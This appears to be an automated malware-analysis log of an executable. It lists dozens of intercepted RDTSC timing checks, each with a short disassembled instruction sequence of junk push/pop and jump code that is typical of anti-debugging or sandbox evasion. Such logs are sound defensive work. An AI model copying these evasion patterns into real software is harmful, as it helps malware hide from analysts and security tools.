Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D93DA second address: 11D93EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D93EF second address: 11D93F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211A9C second address: 1211AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C43Ah 0x00000009 pop esi 0x0000000a pushad 0x0000000b jng 00007F49E4E2C43Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F49E4E2C436h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211C4B second address: 1211C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211C4F second address: 1211C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211C55 second address: 1211C83 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F49E47F2158h 0x00000008 push edx 0x00000009 jmp 00007F49E47F214Ch 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211C83 second address: 1211C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211C89 second address: 1211C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 ja 00007F49E47F2146h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211DF6 second address: 1211E00 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F49E4E2C436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211E00 second address: 1211E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1211F3E second address: 1211F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F49E4E2C436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1212E76 second address: 1212E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1212E7B second address: 1212E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C449h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1212E98 second address: 1212EB6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F49E47F2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jnl 00007F49E47F2146h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1212EB6 second address: 1212EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 mov dword ptr [ebp+122D20EDh], edx 0x0000000f push E9935B70h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 jmp 00007F49E4E2C43Ch 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1212FFD second address: 1213001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213001 second address: 1213005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213005 second address: 121300F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213192 second address: 1213197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213367 second address: 1213371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F49E47F2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12133FD second address: 1213407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F49E4E2C436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213407 second address: 1213416 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12134FA second address: 1213509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12135E3 second address: 12135EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213A83 second address: 1213AA2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F49E4E2C441h 0x00000008 jmp 00007F49E4E2C43Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F49E4E2C436h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213D04 second address: 1213D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1213D08 second address: 1213D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12140CF second address: 12140FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F49E47F214Ah 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D370Fh] 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F49E47F214Ah 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1214517 second address: 1214521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1214521 second address: 1214525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1214525 second address: 121453F instructions: 0x00000000 rdtsc 0x00000002 js 00007F49E4E2C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F49E4E2C444h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F49E4E2C436h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1216F89 second address: 1216FA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D42A3 second address: 11D42A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D42A7 second address: 11D42CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F49E47F214Ch 0x0000000e ja 00007F49E47F2146h 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d jnl 00007F49E47F2146h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D42CC second address: 11D42E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F49E4E2C436h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d jne 00007F49E4E2C43Ch 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1218AB9 second address: 1218AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F49E47F2154h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121957D second address: 1219583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1219583 second address: 1219588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121AA9A second address: 121AB43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b jbe 00007F49E4E2C43Ch 0x00000011 sub dword ptr [ebp+122D303Ah], ebx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F49E4E2C438h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F49E4E2C438h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f jg 00007F49E4E2C45Bh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F49E4E2C43Fh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121E9AC second address: 121E9F9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49E47F2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D31A9h], edi 0x00000014 pushad 0x00000015 add edx, dword ptr [ebp+124558DAh] 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F49E47F2148h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 movzx ebx, dx 0x0000003b push 00000000h 0x0000003d mov edi, dword ptr [ebp+122D2813h] 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 pop edi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121E9F9 second address: 121EA32 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49E4E2C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F49E4E2C445h 0x0000000f popad 0x00000010 push eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F49E4E2C445h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121EA32 second address: 121EA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1220B2C second address: 1220B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1220B30 second address: 1220B41 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F49E47F2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1220B41 second address: 1220B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1220B45 second address: 1220B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1220B49 second address: 1220B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F49E4E2C445h 0x0000000b popad 0x0000000c nop 0x0000000d cld 0x0000000e jng 00007F49E4E2C43Ah 0x00000014 mov di, 2E78h 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D24B8h], edx 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 mov edi, dword ptr [ebp+122D3603h] 0x00000029 pop edi 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007F49E4E2C438h 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1221ABC second address: 1221AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1220CCA second address: 1220CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1221AC2 second address: 1221B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D17D7h] 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 cmc 0x00000013 mov dx, 0DC8h 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F49E47F2148h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov bx, 7D70h 0x00000038 jmp 00007F49E47F2150h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F49E47F2151h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1222BA4 second address: 1222BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1221C92 second address: 1221C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D78C8 second address: 11D78CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122542E second address: 1225432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12263FA second address: 12263FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1228457 second address: 1228465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12265B6 second address: 12265BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122930C second address: 1229347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F49E47F2148h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 cmc 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d jng 00007F49E47F2150h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122C3AB second address: 122C3D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jnp 00007F49E4E2C436h 0x00000013 pop edi 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1228568 second address: 1228592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F49E47F214Ch 0x0000000a js 00007F49E47F2146h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F49E47F2155h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122B4FB second address: 122B4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122B4FF second address: 122B503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122E34B second address: 122E35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C43Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123150A second address: 1231528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F2154h 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4E2 second address: 122F4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4E6 second address: 122F4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4EA second address: 122F4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4F3 second address: 122F4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4FF second address: 122F503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F503 second address: 122F507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F5FE second address: 122F609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F49E4E2C436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A16B second address: 123A16F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A16F second address: 123A1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F49E4E2C436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F49E4E2C440h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F49E4E2C43Eh 0x00000019 js 00007F49E4E2C436h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A1A4 second address: 123A1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A1AF second address: 123A1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A1B3 second address: 123A1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12398F6 second address: 123990C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F49E4E2C436h 0x00000008 jng 00007F49E4E2C436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123990C second address: 1239918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F49E47F2146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1239918 second address: 123993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F49E4E2C449h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123993C second address: 1239946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F49E47F2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1239A96 second address: 1239A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1239A9A second address: 1239AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F49E47F214Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1241CBF second address: 1241CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
